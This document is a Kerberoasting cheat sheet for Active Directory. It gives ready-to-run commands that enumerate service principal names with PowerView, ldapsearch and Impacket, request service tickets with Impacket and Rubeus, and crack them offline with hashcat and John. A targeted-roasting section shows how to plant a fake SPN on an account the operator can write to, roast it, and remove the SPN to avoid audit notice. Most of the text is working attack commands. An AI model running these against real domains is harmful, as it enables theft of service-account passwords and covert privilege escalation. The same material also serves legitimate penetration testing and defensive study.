
Overview

Any authenticated domain user can request a TGS service ticket for any account that has a servicePrincipalName set. Part of that ticket is encrypted with the service account's Kerberos key, which is derived from the account's password, so the ticket can be taken offline and cracked with no further traffic to the DC. Worthwhile targets are user accounts with SPNs (service accounts); computer accounts also carry SPNs but use long random machine passwords that will not crack. Every request logs event ID 4769 on the DC, so roasting every SPN at once stands out where that event is monitored.

Find SPNs

PowerView

Get-DomainUser -SPN | Select SamAccountName, ServicePrincipalName

ldapsearch

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "user@domain.local" -w 'pass' "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

Impacket

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP

Request Tickets

Impacket (Linux)

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request
impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Rubeus (Windows)

.\Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_account

PowerView

Request-SPNTicket -SPN "MSSQLSvc/sql.domain.local"

setspn (Built-in; enumerates SPNs only, does not request tickets)

setspn -T DOMAIN -Q */*

Crack

Hashcat

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

Mode 13100 is for RC4-HMAC (etype 23) tickets, the $krb5tgs$23$ lines. AES tickets need -m 19600 (etype 17) or -m 19700 (etype 18) and crack far more slowly, which is why the tools above request RC4 by default; an account restricted to AES via msDS-SupportedEncryptionTypes only hands back AES tickets.

John

john --format=krb5tgs hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

If you hold GenericAll, GenericWrite or WriteProperty on servicePrincipalName over a user that has no SPN, add one, roast the account, then remove it. The value you set must not already exist on another object (SPNs must be unique in the forest) or the write fails. The Set and Clear steps are directory changes, so they are visible to anyone auditing object modifications; clean up as soon as the ticket is in hand.
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
.\Rubeus.exe kerberoast /user:targetuser
Set-DomainObject -Identity targetuser -Clear serviceprincipalname   # Cleanup

Quick Reference

Task        Command
Find SPNs   impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC
Request     add -request -outputfile hashes.txt to the command above
Crack       hashcat -m 13100 hashes.txt wordlist
Rubeus      .\Rubeus.exe kerberoast